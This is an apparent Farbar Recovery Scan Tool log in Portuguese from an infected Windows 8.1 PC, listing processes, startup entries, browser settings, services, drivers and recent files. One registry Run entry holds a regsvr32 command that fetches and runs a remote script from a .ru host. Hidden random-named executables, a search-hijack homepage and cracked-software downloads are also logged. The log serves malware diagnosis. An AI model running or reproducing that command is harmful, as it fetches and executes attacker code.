Resultado do exame da Farbar Recovery Scan Tool (FRST) (x86) Versão: 24-05-2017
Executado por gabri_000 (administrador) em COMPUTADOR (24-05-2017 17:23:44)
Executando a partir de C:\Users\gabri_000\AppData\Local\Temp\scoped_dir5484_8865
Perfis Carregados: gabri_000 (Perfis Disponíveis: CPD-2 & Ana Luisa & gabri_000)
Platform: Microsoft Windows 8.1 Pro (X86) Idioma: Português (Brasil)
Internet Explorer Versão 11 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(GAS Tecnologia) C:\Program Files\GbPlugin\gbpsv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
() C:\Program Files\MySQL\MySQL Server 5.7\bin\mysqld.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Microsoft Corporation) C:\Windows\System32\SppExtComObj.Exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(GAS Tecnologia) C:\Program Files\GbPlugin\gbpsv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Reader_6.4.9926.18589_x86__8wekyb3d8bbwe\glcnd.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Valve Corporation) C:\Program Files\Steam\Steam.exe
(Valve Corporation) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files\Common Files\Steam\SteamService.exe
(Valve Corporation) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera_crashreporter.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe
(Microsoft Corporation) C:\Windows\System32\control.exe
(Opera Software) C:\Program Files\Opera\45.0.2552.812\opera.exe

==================== Registro (Whitelisted) ====================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1162360 2017-04-25] (Adobe Systems Incorporated)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-26] (Microsoft Corporation)
HKLM\...\Run: [Diebold - Warsaw] => C:\Program Files\Diebold\Warsaw\core.exe [813104 2017-01-18] (GAS Tecnologia LTDA)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-11-14] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap.dll,ShadowPlayOnSystemStart
Winlogon\Notify\ GbPluginBb: C:\Program Files\GbPlugin\gbieh.dll [2017-05-23] (Banco do Brasil)
HKU\S-1-5-21-999244827-3889655543-3830268810-1006\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll
ShellExecuteHooks: GbPluginObj Class - {E37CB5F0-51F5-4395-A808-5FA49E399F83} - C:\PROGRAM FILES\GbPlugin\gbieh.dll [1947872 2017-05-23] (Banco do Brasil)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll [2017-03-21] (Google)
Startup: C:\Users\CPD-2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.lnk [2017-05-17]
ShortcutTarget: 1.lnk -> C:\Users\gabri_000\AppData\Roaming\eeLhFb93xr.exe (Nenhum Arquivo)
Startup: C:\Users\CPD-2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recorte de tela e Iniciador do OneNote 2007.lnk [2016-10-13]
ShortcutTarget: Recorte de tela e Iniciador do OneNote 2007.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\gabri_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6.lnk [2017-05-12]
ShortcutTarget: 6.lnk -> C:\Users\gabri_000\AppData\Roaming\eeKgEa82wq.exe ()
GroupPolicy: Restrição ? <======= ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Tcpip\..\Interfaces\{5D998338-2CC3-4BBF-9913-A7C47961E94E}: [NameServer] 10.0.0.2,10.0.0.3
Tcpip\..\Interfaces\{9E64DD5E-A047-49A9-AEAF-21AF5A357C66}: [NameServer] 10.0.0.11
Tcpip\..\Interfaces\{A412FCC7-6DB5-4F2F-97B1-D94325A9B908}: [NameServer] 192.168.0.2

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_bxinw_16_41_dopc&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dbr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzutAtDzzyD0AzytAyD0B0CtCzyzy0CyEyDtN0D0Tzu0StCyByEyBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCtD0D0F0CzzyE0AtGyB0FtD0DtG0FtCyEzztGyEyBzz0BtG0DyB0BtCyDtBzzyByEtDyB0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0A0E0DzytC0ByEtGyE0ByDyCtGyEtA0EyEtG0AtAtB0BtG0EtDtB0Bzy0AzyyE0Azy0B0C2QtN0A0LzuyE%26cr%3D1143156450%26a%3Dwny_bxinw_16_41_dopc%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro
HKU\S-1-5-21-999244827-3889655543-3830268810-1006\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_bxinw_16_41_dopc&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzutAtDzzyD0AzytAyD0B0CtCzyzy0CyEyDtN0D0Tzu0StCyByEyBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCtD0D0F0CzzyE0AtGyB0FtD0DtG0FtCyEzztGyEyBzz0BtG0DyB0BtCyDtBzzyByEtDyB0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0A0E0DzytC0ByEtGyE0ByDyCtGyEtA0EyEtG0AtAtB0BtG0EtDtB0Bzy0AzyyE0Azy0B0C2QtN0A0LzuyE%26cr%3D1143156450%26a%3Dwny_bxinw_16_41_dopc%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://br.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_bxinw_16_41_dopc&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dbr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzutAtDzzyD0AzytAyD0B0CtCzyzy0CyEyDtN0D0Tzu0StCyByEyBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCtD0D0F0CzzyE0AtGyB0FtD0DtG0FtCyEzztGyEyBzz0BtG0DyB0BtCyDtBzzyByEtDyB0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StD0A0E0DzytC0ByEtGyE0ByDyCtGyEtA0EyEtG0AtAtB0BtG0EtDtB0Bzy0AzyyE0Azy0B0C2QtN0A0LzuyE%26cr%3D1143156450%26a%3Dwny_bxinw_16_41_dopc%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}
SearchScopes: HKU\S-1-5-21-999244827-3889655543-3830268810-1006 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-26] (Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_131\bin\ssv.dll [2017-05-05] (Oracle Corporation)
BHO: GbIehObj Class -> {C41A1C0E-EA6C-11D4-B1B8-444553540000} -> C:\PROGRAM FILES\GBPLUGIN\gbieh.dll [2017-05-23] (Banco do Brasil)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-05-05] (Oracle Corporation)
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-26] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-05-05] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-05-05] (Oracle Corporation)
FF Plugin: @nvidia.com/3DVision -> C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-11-14] (NVIDIA Corporation)
FF Plugin: @nvidia.com/3DVisionStreaming -> C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-11-14] (NVIDIA Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)

Chrome: 
=======
CHR Profile: C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default [2017-05-22]
CHR Extension: (Google Apresentações) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-16]
CHR Extension: (Google Docs) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-16]
CHR Extension: (Google Drive) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-16]
CHR Extension: (YouTube) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-16]
CHR Extension: (Planilhas do Google) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-02-16]
CHR Extension: (Documentos Google off-line) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-17]
CHR Extension: (AdBlock) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-17]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-13]
CHR Extension: (Gmail) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-16]
CHR Extension: (Chrome Media Router) - C:\Users\gabri_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-05-15]

==================== Serviços (Whitelisted) ====================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

S3 BEService; C:\Program Files\Common Files\BattlEye\BEService.exe [1289224 2017-04-20] ()
S3 cphs; C:\Windows\system32\IntelCpHeciSvc.exe [290224 2015-06-01] (Intel Corporation)
R2 GbpSv; C:\Program Files\GbPlugin\gbpsv.exe [631520 2016-09-24] (GAS Tecnologia)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [930240 2016-11-14] (NVIDIA Corporation)
R2 MySQL57; C:\Program Files\MySQL\MySQL Server 5.7\bin\mysqld.exe [35537920 2016-08-25] () [Arquivo não assinado]
R2 NvNetworkService; C:\Program Files\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-11-14] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [2904000 2016-11-14] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2016704 2016-11-14] (NVIDIA Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [10216688 2016-11-28] (TeamViewer GmbH)
S2 Update service; C:\Program Files\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [Arquivo não assinado]
R2 Warsaw Technology; C:\Program Files\Diebold\Warsaw\core.exe [813104 2017-01-18] (GAS Tecnologia LTDA)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [278264 2013-08-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [22240 2013-08-22] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [109184 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [137632 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [22432 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 gbpddreg; C:\Windows\System32\drivers\gbpddreg32.sys [25848 2017-05-22] (GAS Tecnologia)
R0 GbpKm; C:\Windows\System32\drivers\gbpkm.sys [49496 2015-11-04] (GAS Tecnologia)
R1 HWiNFO32; C:\Windows\system32\drivers\HWiNFO32.SYS [23840 2017-05-05] (REALiX(tm))
R3 MEI; C:\Windows\System32\drivers\HECI.sys [41088 2010-10-19] (Intel Corporation)
S3 MTsensor; C:\Windows\system32\DRIVERS\ASACPI.sys [5810 2004-08-13] ()
R1 ndisrd; C:\Windows\system32\DRIVERS\gbpndisrdn.sys [29400 2016-06-07] (GAS Tecnologia)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26048 2016-11-14] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad32v.sys [50744 2016-11-14] (NVIDIA Corporation)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [147072 2016-09-05] (Samsung Electronics Co., Ltd.)
S3 ssudobex; C:\Windows\system32\DRIVERS\ssudobex.sys [199936 2016-04-25] (Samsung Electronics Co., Ltd.)
S3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [35288 2013-08-22] (The OpenVPN Project)
S3 TTDrv; C:\KOPLAYER\vbox\TTDrv.sys [209904 2015-12-26] (Oracle Corporation)
R1 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [108208 2016-03-04] (Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [174192 2016-03-04] (Oracle Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [29128 2013-08-22] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [214368 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [93024 2013-08-22] (Microsoft Corporation)
R1 wsddfac; C:\Windows\System32\drivers\wsddfac.sys [22744 2017-05-22] (GAS Tecnologia)
R1 wsddntf; C:\Windows\system32\DRIVERS\wsddntf.sys [31864 2016-11-11] (GAS Tecnologia)
S1 wsddpp; C:\Windows\system32\drivers\wsddpp.sys [22624 2016-11-11] (GAS Tecnologia)
S3 wsddprm; C:\Windows\system32\drivers\wsddprm.sys [22624 2016-11-11] (GAS Tecnologia)
S3 WUDFWpdMtp; C:\Windows\system32\DRIVERS\WUDFRd.sys [187392 2013-08-22] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Um Mês Criados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2017-05-24 17:23 - 2017-05-24 17:23 - 00000000 ____D C:\FRST
2017-05-24 17:21 - 2017-05-24 17:21 - 01770496 _____ (Farbar) C:\Users\gabri_000\Downloads\FRST.exe
2017-05-24 17:12 - 2017-05-24 17:12 - 00047223 _____ C:\Users\gabri_000\Downloads\vcruntime140.zip
2017-05-24 17:08 - 2017-05-24 17:08 - 00904176 _____ C:\Users\gabri_000\Downloads\dllkit-setup.exe
2017-05-24 17:08 - 2017-05-24 17:08 - 00000995 _____ C:\Users\gabri_000\Desktop\Dll Kit Pro.lnk
2017-05-24 17:08 - 2017-05-24 17:08 - 00000000 ____D C:\Users\gabri_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dll Kit Pro
2017-05-24 17:08 - 2017-05-24 17:08 - 00000000 ____D C:\Users\gabri_000\AppData\Local\{003ACA6A-C058-424D-B955-A82DE5375C64}
2017-05-24 17:08 - 2017-05-24 17:08 - 00000000 ____D C:\Program Files\SoftUpdateChecker
2017-05-24 17:08 - 2017-05-24 17:08 - 00000000 ____D C:\Program Files\DllKitPRO
2017-05-24 17:02 - 2017-05-24 17:02 - 02786824 _____ (DLL-Files.com Client ) C:\Users\gabri_000\Downloads\clientsetup_d-0.exe
2017-05-24 17:00 - 2017-05-24 17:00 - 13969576 _____ (Microsoft Corporation) C:\Users\gabri_000\Downloads\vc_redist.x86.exe
2017-05-24 16:58 - 2017-05-24 16:58 - 01005170 _____ C:\Users\gabri_000\Downloads\Windows8.1-KB2999226-x64.msu
2017-05-24 16:57 - 2017-05-24 16:57 - 00603348 _____ C:\Users\gabri_000\Downloads\Windows8.1-KB2999226-x86.msu
2017-05-24 16:56 - 2017-05-24 16:56 - 00625544 _____ C:\Users\gabri_000\Downloads\Windows8-RT-KB2999226-x86.msu
2017-05-24 12:57 - 2017-05-24 12:57 - 00000000 ____D C:\Users\CPD-2\AppData\Local\Steam
2017-05-23 11:28 - 2017-05-23 11:28 - 00064680 _____ C:\Users\CPD-2\Downloads\MARKETING_E_ADMINISTRACAO_APLICADA_TRABALHO_LIDERANCA_E_MOTIVACAO.PPTX
2017-05-23 07:45 - 2017-05-23 07:45 - 00633794 _____ C:\Users\CPD-2\Downloads\SISTEMA_UNICO_DE_SAUDE_PACTO_PELA_VIDA.PDF
2017-05-22 11:37 - 2017-05-22 11:37 - 01196147 _____ C:\Users\CPD-2\Downloads\PRATICAS_INTEGRADAS_APLICADAS_A_FARMACIA_APOSTILA_PARA_ESTUDO_COLETA_DE_SANGUE.PDF
2017-05-19 17:13 - 2017-05-19 17:13 - 02048512 _____ C:\Users\gabri_000\Downloads\SISTEMAS_DIGITAIS_AULA__FUNCOES_E_PORTAS_LOGICAS (1).PPT
2017-05-19 17:13 - 2017-05-19 17:13 - 00049213 _____ C:\Users\gabri_000\Downloads\LABORATORIO_DE_SISTEMAS_DIGITAIS_ROTEIRO_PRATICA_2 (2).PDF
2017-05-19 12:33 - 2017-05-22 18:02 - 00000000 ____D C:\Users\gabri_000\AppData\Local\CrashDumps
2017-05-19 07:52 - 2017-05-19 07:52 - 02103296 _____ C:\Users\CPD-2\Downloads\ETICA_E_LEGISLACAO_FARMACEUTICA_AULA_4_PRESCRICAO_FARMACEUTICA_586.PPT
2017-05-19 07:52 - 2017-05-19 07:52 - 02100736 _____ C:\Users\CPD-2\Downloads\ETICA_E_LEGISLACAO_FARMACEUTICA_AULA_4_PRESCRICAO_FARMACEUTICA_586 (1).PPT
2017-05-17 20:32 - 2017-05-17 20:32 - 83783266 __RSH () C:\Users\CPD-2\AppData\Roaming\eeLhFb93xr.exe
2017-05-17 20:20 - 2017-05-17 20:20 - 00791052 _____ C:\Users\CPD-2\Downloads\Rádio.zip
2017-05-16 21:32 - 2017-05-16 21:32 - 10967124 _____ C:\Users\CPD-2\Downloads\FARMACOLOGIA_AINES_E_AIES.PDF
2017-05-15 15:17 - 2017-05-15 15:17 - 00001105 _____ C:\Users\Public\Desktop\Opera.lnk
2017-05-15 15:17 - 2017-05-15 15:17 - 00001105 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-05-15 15:17 - 2017-05-15 15:17 - 00000000 ____D C:\Users\gabri_000\AppData\Roaming\Opera Software
2017-05-15 15:17 - 2017-05-15 15:17 - 00000000 ____D C:\Users\gabri_000\AppData\Local\Opera Software
2017-05-15 15:17 - 2017-05-15 15:17 - 00000000 ____D C:\Program Files\Opera
2017-05-15 15:16 - 2017-05-15 15:16 - 01164632 _____ (Opera Software) C:\Users\gabri_000\Downloads\OperaSetup.exe
2017-05-15 14:45 - 2017-05-15 14:45 - 02276144 _____ C:\Users\gabri_000\Downloads\ANALISE_E_PROJETO_DE_SISTEMAS_APSSLIDES_AULAS_123.PDF
2017-05-15 12:58 - 2017-05-15 12:58 - 00684683 _____ C:\Users\gabri_000\Downloads\ANALISE_E_PROJETO_DE_SISTEMAS_APSSLIDES_AULAS_456.PDF
2017-05-15 12:30 - 2017-05-15 12:30 - 00287128 _____ C:\Users\gabri_000\Downloads\ANALISE_E_PROJETO_DE_SISTEMAS_APS__MODELO_DOCUMENTO_DE_REQUISITOS (1).PDF
2017-05-13 14:57 - 2017-05-23 18:54 - 00000000 ____D C:\Users\CPD-2\AppData\Local\Battle.net
2017-05-13 14:57 - 2017-05-13 15:00 - 00000000 ____D C:\Users\CPD-2\Documents\Heroes of the Storm
2017-05-13 14:57 - 2017-05-13 14:59 - 00000000 ____D C:\Users\CPD-2\AppData\Roaming\Battle.net
2017-05-13 14:57 - 2017-05-13 14:57 - 00000000 ____D C:\Users\CPD-2\AppData\Local\Blizzard Entertainment
2017-05-13 14:53 - 2017-05-13 14:54 - 22112258 _____ C:\Users\CPD-2\Downloads\[9.8]mapa global.rar
2017-05-13 14:28 - 2017-05-13 14:28 - 08857293 _____ C:\Users\CPD-2\Downloads\[1077]Atlantyda.rar
2017-05-13 14:26 - 2017-05-13 14:26 - 09566225 _____ C:\Users\CPD-2\Downloads\[1077]Neptune.rar
2017-05-13 14:25 - 2017-05-13 14:25 - 08919665 _____ C:\Users\CPD-2\Downloads\[1077]Norah.rar
2017-05-13 14:25 - 2017-05-13 14:25 - 02103157 _____ C:\Users\CPD-2\Downloads\[1077]Emerald.rar
2017-05-12 17:44 - 2017-05-12 17:44 - 00267010 _____ C:\Users\gabri_000\Downloads\FISICA_EXPERIMENTAL_I_APOSTILA_LAB_FISICA.PDF
2017-05-12 17:43 - 2017-05-12 17:44 - 81596770 __RSH C:\Users\gabri_000\AppData\Roaming\eeKgEa82wq.exe
2017-05-12 12:33 - 2017-05-12 12:34 - 00821155 _____ (Apoio Informática Ltda. ) C:\Users\gabri_000\Downloads\visualg 2.0.exe
2017-05-11 18:14 - 2017-05-11 18:33 - 354596506 _____ C:\Users\gabri_000\Downloads\-Getintopc.com-Autodesk_AutoCAD_2006.zip
2017-05-11 18:08 - 2017-05-11 18:08 - 00931840 _____ C:\Users\gabri_000\Downloads\download_autocad_2007_crack_64_bit.iso
2017-05-11 13:24 - 2017-05-11 13:24 - 00640934 _____ C:\Users\gabri_000\Downloads\lista exercícios programados.pdf
2017-05-11 12:37 - 2017-05-11 18:53 - 00000000 ____D C:\Users\gabri_000\AppData\Roaming\CodeBlocks
2017-05-10 08:45 - 2017-05-10 08:45 - 00852042 _____ C:\Users\CPD-2\Downloads\MARKETING_E_ADMINISTRACAO_APLICADA_MOTIVACAO.PPTX
2017-05-09 12:45 - 2017-05-09 12:45 - 02048512 _____ C:\Users\gabri_000\Downloads\SISTEMAS_DIGITAIS_AULA__FUNCOES_E_PORTAS_LOGICAS.PPT
2017-05-08 19:42 - 2017-05-23 15:18 - 00000000 ____D C:\Users\CPD-2\AppData\Local\CrashDumps
2017-05-08 14:25 - 2017-05-08 14:25 - 90615432 _____ (Change Vision, Inc. ) C:\Users\gabri_000\Downloads\astah-professional-7_1_0-f2c212-jre-64bit-setup.exe
2017-05-08 14:20 - 2017-05-08 14:21 - 165697960 _____ (RapidMiner) C:\Users\gabri_000\Downloads\rapidminer-studio-7.5.0-win32-install.exe
2017-05-08 14:16 - 2017-05-08 14:17 - 167866312 _____ (RapidMiner) C:\Users\gabri_000\Downloads\rapidminer-studio-7.5.0-win64-install.exe
2017-05-08 14:13 - 2017-05-08 14:13 - 00678409 _____ C:\Users\gabri_000\Downloads\GOSTOSAS_DEMAIS.pdf
2017-05-05 19:18 - 2017-05-05 19:18 - 00000000 ____D C:\Users\CPD-2\AppData\Local\NVIDIA Corporation
2017-05-05 19:17 - 2017-05-05 19:17 - 00000000 ____D C:\Users\CPD-2\AppData\Local\NVIDIA
2017-05-05 16:52 - 2017-05-05 16:52 - 02177024 _____ C:\Users\gabri_000\Downloads\SISTEMAS_DIGITAIS_AULA__SISTEMAS_DE_NUMERACAO.PPT
2017-05-05 16:38 - 2017-05-05 16:38 - 00000000 ____D C:\Users\gabri_000\AppData\Local\NVIDIA Corporation
2017-05-05 16:37 - 2017-05-05 16:37 - 00002095 _____ C:\Users\Public\Desktop\3D Vision Photo Viewer.lnk
2017-05-05 16:37 - 2017-05-05 16:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-05-05 16:37 - 2017-05-05 16:37 - 00000000 ____D C:\Program Files\AGEIA Technologies
2017-05-05 16:37 - 2016-11-14 09:35 - 01377752 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap.dll
2017-05-05 16:37 - 2016-11-14 09:35 - 01316136 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge.dll
2017-05-05 16:37 - 2016-11-14 09:35 - 00091336 _____ C:\Windows\system32\NvRtmpStreamer32.dll
